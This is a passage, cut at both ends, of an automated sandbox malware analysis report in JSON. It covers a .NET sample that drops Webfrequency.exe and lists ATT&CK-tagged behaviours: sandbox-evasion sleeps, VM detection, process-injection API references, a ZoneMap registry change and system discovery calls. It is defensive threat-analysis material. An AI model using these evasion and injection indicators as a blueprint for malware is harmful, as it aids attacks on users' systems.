trying to access non-existent file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe.config\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\fusion.localgac\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\chrome\\\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.INI\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe.Local\\\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Webdevelop\\Webfrequency.exe:Zone.Identifier\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\Windows\\System32\\MSCOREE.DLL.LOCAL\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\02968E873DD1AE2851FDF893A4DD3C745E93B3ED9BD716E02B65316C8F148EC4.EXE.CONFIG\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\FUSION.LOCALGAC\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\CHROME\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\02968E873DD1AE2851FDF893A4DD3C745E93B3ED9BD716E02B65316C8F148EC4.INI\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\GAC\\PUBLISHERPOLICY.TME\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\02968E873DD1AE2851FDF893A4DD3C745E93B3ED9BD716E02B65316C8F148EC4.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" writes file \"c:\\users\\%osuser%\\appdata\\roaming\\webdevelop\\webfrequency.exe\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" writes file \"%appdata%\\webdevelop\\webfrequency.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"Webfrequency.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%APPDATA%\\Webdevelop\\Webfrequency.exe]- [targetUID: 00000000-00002568]\n \"network.dat\" has type \"data\"- [targetUID: N/A]\n \"system.dat\" has type \"data\"- [targetUID: N/A]\n \"10-02-2025\" has type \"data\"- [targetUID: N/A]\n \"11-02-2025\" has type \"Non-ISO extended-ASCII text with no line terminators\"- [targetUID: N/A]\n \"Webfrequency.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DYNAMICDAYLIGHTTIMEDISABLED\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"ACTIVETIMEBIAS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Tries to sleep for a long time (more than two minutes)\n Matched sigs: Able to identify virtual environment by using API string\n Matched sigs: Possibly tries to evade analysis by sleeping many times\n Matched sigs: Calls an API typically used to find device information", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-138", "type": 2, "relevance": 2, "name": "Contains ability to use Cryptographic classes", "description": "Found reference to \"System.Security.Cryptography.RandomNumberGenerator\" (Indicator: \"RandomNumberGenerator\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.AesCryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"Aes\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.AesCryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"AesCryptoServiceProvider\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.RSACng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"RSACng\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.DSACng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"DSACng\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.AesManaged, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"Aes\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.AesManaged, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"AesManaged\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.ECDiffieHellmanCng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"ECDiffieHellman\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.ECDiffieHellmanCng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"ECDiffieHellmanCng\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.ECDsaCng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"ECDsa\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.ECDsaCng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"ECDsaCng\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA256CryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"SHA256CryptoServiceProvider\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA384Cng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"SHA384\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA384CryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"SHA384\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA384CryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"SHA384CryptoServiceProvider\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA512Cng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"SHA512\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA512CryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"SHA512\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA512CryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"SHA512CryptoServiceProvider\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"RandomNumberGenerator\" (Indicator: \"RandomNumberGenerator\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.HashAlgorithm\" (Indicator: \"HashAlgorithm\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA256CryptoServiceProvider\" (Indicator: \"SHA256CryptoServiceProvider\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"SHA384\" (Indicator: \"SHA384\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA384\" (Indicator: \"SHA384\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA384Cng\" (Indicator: \"SHA384\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA384CryptoServiceProvider\" (Indicator: \"SHA384\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA384CryptoServiceProvider\" (Indicator: \"SHA384CryptoServiceProvider\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"SHA512\" (Indicator: \"SHA512\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA512\" (Indicator: \"SHA512\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA512Cng\" (Indicator: \"SHA512\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA512CryptoServiceProvider\" (Indicator: \"SHA512\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA512CryptoServiceProvider\" (Indicator: \"SHA512CryptoServiceProvider\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.HMAC\" (Indicator: \"HMAC\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.KeyedHashAlgorithm\" (Indicator: \"HashAlgorithm\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.KeyedHashAlgorithm\" (Indicator: \"KeyedHashAlgorithm\"; Source: \"00000000-00001812.00000000.186728.01C70000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-90", "type": 2, "relevance": 1, "name": "Contains ability to unmap view of a section from a process (API string)", "description": "Found reference to API \"tUnmapViewOfSection\" (Indicator: \"UnmapViewOfSection\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found reference to API \"_NtUnmapViewOfSection\" (Indicator: \"UnmapViewOfSection\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"LoadLibrary\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-439", "type": 2, "relevance": 1, "name": "Contains ability to modify process memory (API string)", "description": "Found reference to API \"_VirtualAllocEx\" (Indicator: \"VirtualAllocEx\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "memorydump-8", "type": 20, "relevance": 1, "name": "Found PE header in memory", "description": "Found PE header \"MZ\" - Source: \"00000000-00001812.00000001.188519.02C70000.00000004.mdmp\")\n Found PE header \"MZ\" - Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp\")\n Found PE header \"MZ\" - Source: \"00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found PE header \"MZ\" - Source: \"00000000-00002568.00000001.186418.02C90000.00000004.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-92", "type": 2, "relevance": 1, "name": "Contains ability to inject code into another process (API string)", "description": "Found reference to API \"_VirtualAllocEx\" (Indicator: \"VirtualAlloc\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found reference to API \"_VirtualAllocEx\" (Indicator: \"VirtualAllocEx\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")\n Found reference to API \"_WriteProcessMemory\" (Indicator: \"WriteProcessMemory\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000001005c005300b82835000f00010e3f4a000e63006f006e00660069006700750072006100740069006f006e00000055004200570053005c0041000b00000b454a0000b828350088bb34006f00630061006c005c00500072006f0067007200 (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000f5f6cc77fd60d077f42e8372d0933400a0358372cd60d077a4e9280090743400b2f4cc77dd60d077b4e9280000007c7200007c720000000010e92800f0000000f0007c720000000020e9280053000000b4ea2800000000000100000084e9280040f5cc77000000000000000070e92800 (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb4b7678543c0000f0fd7f9a5ccd7700e0fd7f98b6280044f0fd7f00000000400000003f0000002400000000f0fd7f8cb62800c15ccd776082d4772400000000f0fd7f9a5ccd7700e0fd7fb0b628005789cc778083d4771317d375d8eb4b76 (UID: 00000000-00002568)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002568)\n \"Webfrequency.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000c8df34006cfa2b00145ccc77435ccc7738fb2b00010000009401320001000000ecf92b00935ccd774083d477d4a0cc775b27d37738fb2b00010000000100000068c0340000000000bcf92b00ecf92b0058fa2b0095e1c8774fda3400feffffffd4a0cc771bbed27500005e7700000000 (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100372c2c4973576f77363450726f636573732c6b65726e656c33322e646c6c2c223235323a33343a30342e363335222c52583d302c50583d30003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000f5f6cc774b35ec77f42e837268d13400a03583727b35ec7724ec140080863400b2f4cc776b35ec7734ec140000007c7200007c720000000090eb1400f0000000f0007c7200000000a0eb14005300000034ed1400000000000100000004ec140040f5cc770000000000000000f0eb1400 (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007f02000000000000008c476874f0bf3c008c47687400000000f0bf3c0024dc1400086dcc771881d47700000000d8dc140000000000de54a46464dc140095e1c87777cf3400feffffff6b2ccd773119d37502100000000000000000010038dc1400c89fcc778c4768740000000000000000 (UID: 00000000-00001812)\n \"Webfrequency.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00001812)\n \"RegAsm.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100372c2c4973576f77363450726f636573732c6b65726e656c33322e646c6c2c223235323a33343a33362e393237222c52583d302c50583d30003000310039005c0063006f006e006600690067005c006d0061006300680069006e0065002e0063006f006e0066006900670000005c004d00 (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031003628f5f004b29c267634371273000000000100000000000000010000004cf5f004000000002812dc0188f5f00498ed630058f5f0048f9c267634371273020000000000000018000000010000005cf5f0042823d86a00005600000000000c0000003420dd0168f5f0042f9912730c000000 (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000088e06300100000000000000088ea200050dce07788e06300100000008ce063000000000010000000c0ea20006eaab86db8dcb76dc16f38de2812dc010200000000000000180000008ce06300c4ea20002823d86a00005600000000000c000000f826b26dd0ea20002f9912730c000000 (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000001000000b8eb20006a6fb1694d79ce322ce720006069bd30c0ed200015debd77d1575145feffffff7f67c577e2d83576f010566ffe42566f74eb20000200000000000000180000006ceb200078eb20002823d86a00005600000000000c00000030a5127384eb20002f9912730c000000 (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000001000000c8eb20006a6fb1693d79ce323ce720001069bd30c0ed200015debd77d1575145feffffff7f67c577e2d83576f010566ffe42566f84eb20000200000000000000180000007ceb200088eb20002823d86a00005600000000000c00000030a5127394eb20002f9912730c000000 (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000504c6136d3049e2040000000060f39705784e136d3049e204a8f39705d724126d3049e20420000000000000009c39126d2812dc0120e2e3012812dc010200000000000000180000000049e204acf397052823d86a00005600000000000c00000020e2e301b8f397052f9912730c000000 (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000088e063001000000000000000a8ea200050dce07788e06300100000008ce063000000000010000000e0ea20006eaab86db8dcb76de16f38de2812dc010200000000000000180000008ce06300e4ea20002823d86a00005600000000000c000000f826b26df0ea20002f9912730c000000 (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000001000000e8eb20006a6fb1691d79ce325ce720003069bd30c0ed200015debd77d1575145feffffff7f67c577e2d83576f010566ffe42566fa4eb20000200000000000000180000009ceb2000a8eb20002823d86a00005600000000000c00000030a51273b4eb20002f9912730c000000 (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb4b767851e2040080fd7f9a5ccd7700f0fd7f40e120004480fd7f00000000400000003f000000290000000080fd7f34e12000c15ccd776082d477290000000080fd7f9a5ccd7700f0fd7f58e120005789cc778083d4771317d375d8eb4b76 (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100000000000000000000000000000000000000000000000000000000000000000000b2f4cc77ddbad8774ce720000000b26e0000b26e0000000000000000e0000000e000b26e00000000b8e62000000000004ce8200000000000010000001ce7200040f5cc77000000000000000008e72000 (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100000000000000000000000000000000000000000000000000000000000000000000b2f4cc7765bbd877a4e7200000007c7200007c720000000000000000f0000000f0007c720000000010e7200000000000a4e82000000000000100000074e7200040f5cc77000000000000000060e72000 (UID: 00000000-00000352)\n \"RegAsm.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000504c6136d28f3e30400000000c0ea4b05784e136d28f3e30408eb4b05d724126d28f3e30420000000000000009c39126d2812dc0194c7e7012812dc0102000000000000001800000000f3e3040ceb4b052823d86a00005600000000000c00000094c7e70118eb4b052f9912730c000000 (UID: 00000000-00000352)\n \"Webfrequency.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000040881e00dcf64f00145ccc77435ccc77a8f74f000100000094011c00010000005cf64f00935ccd774083d477d4a0cc77892ab577a8f74f00010000000100000080c01e00000000002cf64f005cf64f00c8f64f0095e1c8772dd83600feffffffd4a0cc771bbed27500005e7700000000 (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031006c2c205075626c69634b6579546f6b656e3d6237376135633536313933346530383922202f3e0d0a20202020202020203c73656374696f6e206e616d653d2273797374656d2e646961676e6f73746963732220747970653d2253797374656d2e446961676e6f73746963732e5379737465 (UID: 00000000-00004536)\n \"Webfrequency.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000f5f6cc77e935ee77f42e837280d11e00a0358372d935ee7764e91400906d1e00b2f4cc77c935ee7774e9140000007c7200007c7200000000d0e81400f0000000f0007c7200000000e0e814005300000074ea1400000000000100000044e9140040f5cc77000000000000000030e91400 (UID: 00000000-00004536)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")\n \"Webfrequency.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"Webfrequency.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", 